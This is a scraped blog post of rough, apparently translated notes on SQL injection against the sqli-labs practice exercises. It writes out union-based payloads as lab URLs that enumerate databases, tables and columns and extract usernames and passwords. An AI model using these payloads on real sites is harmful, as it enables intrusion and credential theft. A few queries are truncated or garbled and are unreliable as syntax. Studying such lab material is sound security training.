SQL injection

Others 2022-04-28 05:04:38 views: 0

id  title  content  time  author

select * from news where id = 1;

select version();

select * from news where id = 1 order by 1; use order by to sort the number of columns and query the number of columns

 select * from holder where id = 1 union select 1,2,3,4,version(); Use union connection to output two SQL queries, the number of columns must be the same

Actual combat: http://10.1.2.5:10631/sqli/Less-2/?id=1

   First http://10.1.2.5:10631/sqli/Less-2/?id=1 is equivalent to select * from holder where id = 1;

  http://10.1.2.5:10631/sqli/Less-2/?id=1 order by 1 to query the number of columns

  Because the sorting page only displays the first piece of data, http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,version() filters out the first piece of data and outputs the desired data--version number

group_concat() displays query to all columns

information_schema a library

      schemata: save the name of all databases

      tables: save the name of the table

      columns: save the names of all fields

Query all library names http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata There is a column named schema_name from the information_schema library Extract all library names

Query all tables in the current database http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()

Query all column names in a table http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = "users"

Query the contents of the table http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,group_concat(password),group_concat(username) from

 

http://10.1.2.5:10631/sqli/Less-1/?id=1' In the error report, '1'' LIMIT 0, 1 can be seen that id= is followed by other statements, so order by cannot be used directly. It should be like this http://10.1.2.5:10631/sqli/Less-1/?id=''LIMIT 01

http://10.1.2.5:10631/sqli/Less-4/?id=") union select 1,2,database() %23 Close all unclosed symbols when injecting

 

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=326113778&siteId=291194637
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com